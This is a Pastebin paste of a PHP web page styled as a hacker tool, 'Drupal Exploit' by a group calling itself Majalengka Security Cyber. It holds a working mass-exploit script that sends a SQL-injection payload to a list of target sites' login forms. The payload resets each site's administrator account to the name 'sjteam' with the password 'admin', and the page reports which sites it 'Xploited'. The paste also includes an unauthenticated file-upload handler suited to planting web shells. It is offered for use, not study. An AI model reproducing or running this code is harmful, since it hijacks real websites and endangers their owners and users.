Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!Doctype HTML>
- <html>
- <style type="text/css">* {cursor: url(http://ani.cursors-4u.net/cursors/cur-13/cur1156.ani), url(http://ani.cursors-4u.net/cursors/cur-13/cur1156.png), auto !important;}</style><a href="http://www.cursors-4u.com/cursor/2018/03/07/turquoise-electricity-lightning.html" target="_blank" title="Turquoise Electricity Lightning"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Turquoise Electricity Lightning" style="position:absolute; top: 0px; right: 0px;" /></a>
- <head>
- <title>Drupal Exploit</title>
- <body bgcolor="#000" marginwidth="0" marginheight="0" style="background: black url(https://i.gifer.com/PNwl.gif) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size:cover;" onload="type_text()" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0"> <link rel="stylesheet" type="text/css" href="http://magelliott.com/images/comment_images/tolol.css">
- <style type="text/css">
- <head>
- </style>
- <style type="text/css">
- .mymargin{
- margin-top:30px;
- font-family: monospace;
- }
- body, html {
- background-color:black;
- text-align: center;
- color: #008000;
- margin: 10px auto;
- }
- a {
- color: lime;
- text-decoration: none;
- }
- </style>
- </head>
- <body>
- <center><font face="Iceland" size="4px" color="lime">Drupal Exploit - Majalengka Security Cyber</font><br>
- <center>
- <div class="mymargin">
- <center>
- <form method="POST" action="">
- <font color='#00FFFF'>WebSite :</font> <br>
- <textarea name="url" placeholder="Example: www.sitetarget.com" style="resize: none; border: 1px solid #FF1493; color: #00FFFF; background: transparent; margin: 5px auto; padding-left: 5px; width: 500px; height: 250px;"></textarea><br>
- <input style="border: 1px solid #FF1493; color: #00FFFF; background: transparent; margin: 5px; width: 350px; height: 25px;" size="50" type="submit" name="submit" value="Attack">
- </form>
- <br>
- <?php
- /* Created by Xwizx404
- error_reporting(0);
- $submit = $_POST['submit'];
- $url = explode("\r\n", $_POST['url']);
- if($submit) {
- foreach($url as $sites) {
- $log = "/user/login";
- $holako = "/?q=user";
- $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
- $params = array(
- 'http' => array(
- 'method' => 'POST',
- 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
- 'content' => $post_data
- )
- );
- $ctx = stream_context_create($params);
- $data = file_get_contents($sites . '/user/login/', null, $ctx);
- echo "<u>Testing user/login</u><br>";
- if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
- echo "Scanning: <font color=lime>$sites</font><br>";
- echo "Status: Successfully Xploited!<br>";
- echo "Data=> user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
- echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
- } else {
- echo "Scanning: <font color=lime>$sites</font><br>";
- echo "Status: <font color=red>Not Xploited!</font><br><br>";
- }
- }
- }
- if($submit) {
- foreach($url as $sites) {
- $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
- $params = array(
- 'http' => array(
- 'method' => 'POST',
- 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
- 'content' => $post_data
- )
- );
- $ctx = stream_context_create($params);
- $data = file_get_contents($sites . '?q=node&destination=node', null, $ctx);
- echo '<u>Testing at Index</u><br>';
- if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
- echo "Scanning: <font color=lime>$sites</font><br>";
- echo "Status: Successfully Xploited!<br>";
- echo "Data => user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
- echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
- } else {
- echo "Scanning: <font color=lime>$sites</font><br>";
- echo "Status: <font color=red>Not Xploited!</font><br><br>";
- }
- }
- }
- ?>
- </div>
- <?php
- $Drupal = $_POST['Drupal'];
- if($Drupal == 'Drupal') {
- $filename = $_FILES['file']['name'];
- $filetmp = $_FILES['file']['tmp_name'];
- echo "<form method='POST' enctype='multipart/form-data'>
- <input type='file'name='file' />
- <input type='submit' value='go' />
- </form>";
- move_uploaded_file($filetmp,$filename);
- }
- ?>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement